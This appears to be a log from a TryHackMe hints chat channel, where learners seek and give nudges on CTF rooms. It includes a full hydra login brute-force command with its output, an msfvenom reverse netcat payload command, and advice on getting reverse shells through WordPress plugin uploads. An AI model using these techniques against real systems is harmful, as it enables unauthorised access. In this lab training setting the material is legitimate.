Room: GoldenEye Task 1 Question 5. I've retrieved the password in the website source code, that is ||InvincibleHack3r|| but I don't understand what kind of encryption this is. Google search and Hashcat wiki haven't been of help. Is it possible to have a hint of where to look to understand the type of encryption used?
Gotcha, thanks James!
good grief WHY does mr. robots wp-login password change continually?
tf am I doing wrong here
hydra gives me pw, i input, no work. then re-run hydra, diff pw
Sounds like however you're running hydra has a wrong syntax that is causing false positives
went with wpscan instead. ill have to revisit hydra and see just what the heck that was about.
WPScan is much easier
How many tries should Hydra take in Room Printer Hacking 101
I don't think you should be brute forcing anything at all @median reef
Try read the room description (I mean the texts in the room)
Or go for some writeups
This channel is not for pushing people to writeups.
ah thanks @stuck fractal @winged mist
Yayyy
Evening, Having an issue with the Mr robot CTF room. I'm guessing I'm on the right track however I'm slightly stuck. Managed to get on to the wordpress login, however it will not let me install a plugin of which im sure is whats required so i can get a reverse shell. It only accepts .zip so i zipped my reverse shell and uploaded it. All i get in return is Plugin install failed.
@haughty fractal That's because you are supposed to upload a plugin, not a reverse shell
You might want to search for wordpress plugin reverse shell or something like that
There is also a metasploit module for that I believe that you can use
thanks for the suggestion, I will look that up
for wonderland, is that .dbf file a rabbit hole?
Completely and utterly
Need some assistance here. New to try hack me and I'm stuck in nmap room. I have been stuck on this question for a few minutes now. "How do I set the timing to the max level, sometimes called insane" I've tried a lot of the timing commands in help. Any hints? Thank you!
@white salmon did you check the man pages? It should tell you which flag is for insane
Ok thank you @plucky steppe
hey I'm a beginner. Any hint here?
You need to run the binary
ok that worked
I kept running binary in /home directory so I couldn't get it
thanks
Yeah
Do you know what you're doing with ./file?
. Refers to the current directory
./file is just a path to the file in the current working directory
You could run the shiba1 binary with /home/shiba1/shiba1
You're providing a path to the binary
But that first screenshot, you're trying to execute a directory rather than a binary. That doesn't work.
ohhhh
now i got it
so it goes from home -> shiba2 -> ./shiba2
but I did it like home -> ./shiba2
If your cwd is /home/shiba2 then ./shiba2 is equivalent to /home/shiba2/shiba2
Please don't call me bro.
oh my bad
It's just uncomfortable seeing as you don't know me
I hate that myself
@storm relic Hey, this channel is for asking for hints on TryHackMe rooms
sry was a mistake.
Hi all, anyone with room mitre? >>> T7 Q6, I can't find enough information about
Can anyone give a hint for the "youre in a cave" room? Im confused asf lol
@buoyant olive it'll be on the page for the sub-technique you found in T7 Q3
@pallid siren we're unable to give hints for new challenge rooms until 72 hours have passed. (rule 13 in #rules ) sorry.
Didnt realize it was that new of a room
no worries
Hello. I am stuck in the Biohazard room at the stage with crests. Could you give me a tip on how to crack the 2nd crest the second time and the 4th crest the first time pls? I tried base64/32/16 but none of them works. Was there a tip in one of the rooms on how to solve this?
You're trying the right thing. I suggest using "cyberchef" for tasks like this. Makes it really easy to try different encoding combinations. Hint: if you search for "from base" on cyberchef, multiple options show up, not just the common ones.
Still trying to figure out "the cave"... has me feeling like an idiot, i know everything is right in front of me, yet still eludes me
Question about scp. After the scp command, are you inputting the machine you want to send the file to from the attack machine? i.e attacked@10.10.10.10$~ scp -r host@10.10.20.20 file.txt ~/Documents?
I am looking it up but it isn't being clear to me
Nevermind, I was trying to scp in the attack machine
Thank you. I didn't know about this site.
@remote gate TY bro
in hackpark room i provide that code : hydra -l admin -P /root/Desktop/Tools/wordlists/rockyou.txt 10.10.165.65 http-form-post "/Account/login.aspx?ReturnURL=admin:__VIEWSTATE=HVbKOC0ImvT7i5HZIKB9jOOzTKMe%2Fkvu%2BJarqDJcI3XVWvNsbD%2Bt35WfZ9bLjm7xjjvyC4PuIkVEiEEhd2l55FGZF71eJorrNFbKNUbUIKJ9xY5sgEUGVqvTxLz1lUs6t7Dd5fNFgLZcj5z1OEuPs%2FFVV%2F4IaUwQU5%2F7zq433vSZhYEp&__EVENTVALIDATION=3gOgkV6%2Fwhg7RxsUs8eJuXLPNWbSyQjoLzX%2Bn1Nb4SQ09Jq94FHl6sdwCPuFMEzmylrhI78YIFPDtk4euAQ23yus%2ByU3sob%2B5YAMq83kXpPEBTy33jMXE42iF%2FsFz58%2FuWafmg%2BgelWA7IPuG9jpTXW%2FBx0BaIFQ4%2FzX4AX%2BN59qxzdi&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
and receive this
[80][http-post-form] host: 10.10.165.65 login: admin password: 12345
[80][http-post-form] host: 10.10.165.65 login: admin password: 123456
[STATUS] attack finished for 10.10.165.65 (waiting for children to complete tests)
[80][http-post-form] host: 10.10.165.65 login: admin password: 123456789
[80][http-post-form] host: 10.10.165.65 login: admin password: password
[80][http-post-form] host: 10.10.165.65 login: admin password: iloveyou
[80][http-post-form] host: 10.10.165.65 login: admin password: princess
[80][http-post-form] host: 10.10.165.65 login: admin password: 1234567
[80][http-post-form] host: 10.10.165.65 login: admin password: rockyou
[80][http-post-form] host: 10.10.165.65 login: admin password: 12345678
[80][http-post-form] host: 10.10.165.65 login: admin password: daniel
[80][http-post-form] host: 10.10.165.65 login: admin password: babygirl
[80][http-post-form] host: 10.10.165.65 login: admin password: jessica
[80][http-post-form] host: 10.10.165.65 login: admin password: monkey
[80][http-post-form] host: 10.10.165.65 login: admin password: abc123
[80][http-post-form] host: 10.10.165.65 login: admin password: nicole
[80][http-post-form] host: 10.10.165.65 login: admin password: lovely
1 of 1 target successfully completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-11-20 12:21:13
the answer is not found, is that a bug ?
try running hydra again
i try and try for days
days 2 to be exact
i have to cheat on this question
i ran the command twice and got the right answer
I heard from today we can make attempts on asking questions on yoto. I'm still trying to get in, but I think I have something what can be used to continue but not sure what I need to provide ))
In the Kenobi room using smb, I'm confused about the T2 Q3. It looks like it wants me to recursively d/l and gives the example smbget -R smb://ip/anonymouse
When I run that it says command not found.
Did I miss something?
@Rick So the code u run is different ? or did i make an error ,
?
@stone oyster it means smbget is not installed
well...that's stupid.
lol
maybe I will go install.
maybe I won't.
we shall see
ty
hi guys need a hint for lazy admin for root
for getting privesc when using perl system when specifying a file with a path
any idea how to achieve it?
sorry just found the solution through a write up i messed up when reading the file permissions and trying to write to the file
No worries, happy hacking!
thanks
Hello, need a nudge for ignite privesc
I am new to thm, I am working on the linux challenges and I am having a tough time access flag 3? any tippers
@viscid osprey You can DM me
Hi what is the name of the room?
Linux challenges
task 3 linux functionality
ohh
Room: Hashing - Crypto 101
Task 6
First question is about amd64 Kali 2019.4 ISO's SHA1 sum. I can't find anywhere the version from 2019, only 2020 is available. How I am going to get past this question?
PS: The link provided is not working either.
first question in which task?
Task 6
do you know the wayback machine?
this is obviously not how the room intended you to find it, but it's a cool tool to learn about if you haven't used it before
Or you can look for old release indexes, that is what I did
Kali maintains an index of all kali,backtrack and other releases
recently though chika? cause that's what I did but the site doesn't seem to have them any more
I just checked it
oh then I missed it
I can DM you the index if you want
ahhh old.kali.org
Yeah, but let him find it on his own
the issue is that the link reads right, but the hyperlink is different, goes to cdimages.kali.org
I just searched for Index of --- when I was searching for the first time
I will try this. It's my first time hearing about this.
i should've spotted the error
Don't worry about it. You DID spot the error
if you keep reading you'll see you can get it the intended way too Iulian, but the wayback machine is definitely something you should check out too
Yep, I solved it already
I missed this as well
Thank you, guys 
In need of help with CSP, Q3 if anyone is around/available
I'm having a bit of issues with the LazyAdmin room
I can't get the php rce to work.
need more than that exoticsloth, what did you try, give us a screenshot maybe
so what did you do with that file?
i think, although I got a shell a different way, that you have to add that file in the admin panel as an Advert
so in other words you login with the username and password you found and you upload that html in the Ad section
then request it from your browser
you're getting a 404 because you're requesting a URL that doesn't exist I think
but the login page comes only when the injection is successful right?
did you find login creds?
yes
and did you search for a login page?
nope
do that ||gobuster||
so gobuster the inc page?
what directories did you find under ||/content||?
I got the login. trying to upload a py file
good luck
damn.
i got it but
I needed a bit of help after getting the rev shell
Thanks though @median compass
hi guys need help in intro to x86-64 task 4 in if2 the value for var_8h the value im getting on px rbp-0x8 is wrong
Hello ppl, I need some help. What am I doing wrong?
What Room? Advent of Cyber
What Task? Task 7 [Day 2] Arctic Forum
What question? What is the path of the hidden page?
What have you tried?
- gobuster dir -u http://10.10.3.39:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s 200 -t 100
- wfuzz -u http://10.10.3.39:3000/FUZZ --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
What happened? It didn't find the hidden page, just the already known (login, register, logout)
The wordlist is recommended in the supporting material.
Did you terminate the day 1 VM and deploy the day 2 VM?
could use a hint for grep
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.
I was trying to do
find /* 2>/dev/null | grep -o -P '.{0,32}4bceb.{0,32}'
Oh no!! I Thought just one deploy would solve the room, like the others!!! Thank you!!!
There's a couple rooms with multiple VMs
Good to know!!
Hi! I'm stuck at AoC1 task 18 Im already Net authority system but I cant find root.txt file. Any hint?
On windows machines the user/root.txts are usually in the Desktop folder
Mmm maybe it's hidden
Administrator desktop
thanks
How does this look?
grep -P "\b4bceb\w{27}\b" /*
I don't know
hi all. is there an easy way to use both msf5 and msf6? I'm noticing that I'm having a lot of issues with msf6.
i still havent had any problems with msf6
msf6 is unstable in some conditions
well you can check reddit and github.. people have posted their issues there.
ok, fair enough
can anyone give me a nudge on 'in a cave', I've tried every verb i can find, not really sure what I'm missing, I'm sure ill kick myself when i find it
Hi. Need a bit of help:
What Room? Common Linux Privesc
What Task? Task 8 Exploiting Crontab
What question? Create a payload using: "msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R"
What have you tried?
I tried running the command, however the response I get is msfvenom: command not found. I am logged in as user4, as per instructions. What am I doing wrong?
You're supposed to run msfvenom on your own box not on the target.
when I do that, I get: Error one or more options failed to validate: LHOST.
replace LOCALIP with your attack box IP
thank you.
hi can anyone give me a hint on the learn linux walkthrough bonus challenge - the true ending
Look for files owned by other users.
is it outside the home/nootnoot directory?
It is iirc. Use find and check files owned by each user.
yes, search for files owned by every user you found, there's a switch in find for that, one file will be in an out-of-the-ordinary place
shiba4@nootnoot:/$ find */ -user noot 2>/dev/null
home/noot
home/noot/.profile
home/noot/.bashrc
home/noot/.bash_logout
shiba4@nootnoot:/$ find */ -user nootnoot 2>/dev/null
home/nootnoot
home/nootnoot/.sudo_as_admin_successful
home/nootnoot/.profile
home/nootnoot/.gnupg
home/nootnoot/.bashrc
home/nootnoot/.bash_history
home/nootnoot/.local
home/nootnoot/.local/share
home/nootnoot/.cache
home/nootnoot/.bash_logout
shiba4@nootnoot:/$
is all i can find
and i have no access on the .local/share
every user @exotic echo, you found a lot more than just those two
i tried every user in the /etc/passwd file but im clueless
Its there. You may have seen it.
do i only need to check /bin/bash users? or also all the nologin ones
Don't worry about those other users
Hi there, doing Dogcat room, got the root access on the machine, but i'm unable to find a flag4 on the machine, any hint on the location?
maybe it's not on the machine
Oh alright. thanks i'm gonna look for it somewhere else then
i ended up cheating the first part, i totally looked over it lol i was going way too deep in de files
3-4hours what could be 10 sec xD
Hey there!
I am a little bit stuck with the Question "Which registries are set to 1 while the nozzle is filling a bottle?" in the room "attacking ICS Plant #1"
I did the whole room, but I am Stuck with the Flag. Has anyone a hint?
@primal mantle You found the answer for Which registries are set to 1 while the roller is moving the bottles but not the previous one ?
@white salmon You got me there. But i figured when i get the grasp on the first question i could figure out the 2nd.
my guess for the first is 24 thats what i saw and what worked for me in the questions later on...
you got it ? because am also struggling for it , and not getting anything
can anyone give hint regarding this , it will be appreciated
tnx mate
Thanks @frail rain You rock. I should have seen that.
There seems to be a problem with the https://tryhackme.com/room/crackthehash room , task 1 , question 4 hint says "A lot of tools will attempt to identify this as bcrypt and, well, that's not exactly right. Bcrypt is often cited (at this time) as being very difficult to crack. Try some other formats that start with the letter b, you'll see them in the suggested hash types" but no other hash types that start with b fits the hash , hashcat doesnt even start , at least the ones I have tried (that are listed in https://hashcat.net/wiki/doku.php?id=example_hashes).
I just checked a writeup and it says this is a bcrypt hash , why is the hint misleading ?
drop a note in #feedback-and-ideas maybe @indigo hill
yea i will do that , i am new didnt know, thanks
Still cant figure out what to do with "youre in a cave". Can i get a hint or 2?
Please wait another day
it's been more than 3 days already
where are you stuck?
Announcement was 20th, so if it was silent then oof. It's down to you anyway as you're the creator
@woven mirage sent you a pm. Didnt want to say too much in chat
well
play with the headers
one of them can show you the way
this first part uses a vulnerability not that common in tryhackme rooms, i think that i saw two or three that covers it, and i done most of the rooms in the platform
Will keep trying
Who wants to help me with tomghost, getting the root flag.. I'm so close but I keep running into issues..
I don't want to spoil so if I could dm whoever will help, that would be lovely.
disregard.
Just did the THM NMAP walk through and learned quite a bit, still missing a couple though. Super fun!!
Idk... im not getting it. Interesting room (cave), but over my head.
@pallid siren ||all i can think from Termacks hint is vhosts, but i don't know where to start *.thm?||
any hints for physical security intro? getting tired to solve this one.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@stuck fractal I am stuck with padlock and lock anatomy stage in physical security intro room.
Question numbers etc?
task4 question number 4
finding a lot of docs but can't find correct answer
trying this room for two days.
@pseudo wraith https://en.wikipedia.org/wiki/Shim_(lock_pick)
A shim is a tool that is used to bypass padlocks. It works by retracting the spring-loaded catch that restrains the shackle.
Like other types of lockpicks, shims can be professionally made or improvised out of easily available materials like aluminum cans.
Higher security padlocks typically use techniques that make shimming impossible. The most ...
Honestly it was much easier for me to find resources knowing the answer
Foothold has nothing to do with vhosts
thanks
@woven mirage || insecure deserialization?, totally lost||
meh, I'm gonna give up, not learning much by bashing my head against the wall
box : buffer overflow prep
task : overflow 1
I've got the offset as 1976 why it's not accepting the answer
@lyric oasis where is EIP (instruction pointer)
I've not used mona
instead I've used pattern_offset
Hi all, quick question. im at the learn linux basics room. im trying to repeat the exercise. Ive created a file called noot.txt and run both that binary and did a cat shiba1 command but all it gives me is a random message with loads of special characters. Any advice in the right direction will be appreciated
trying to get the password for shiba2
dont worry
figured it out
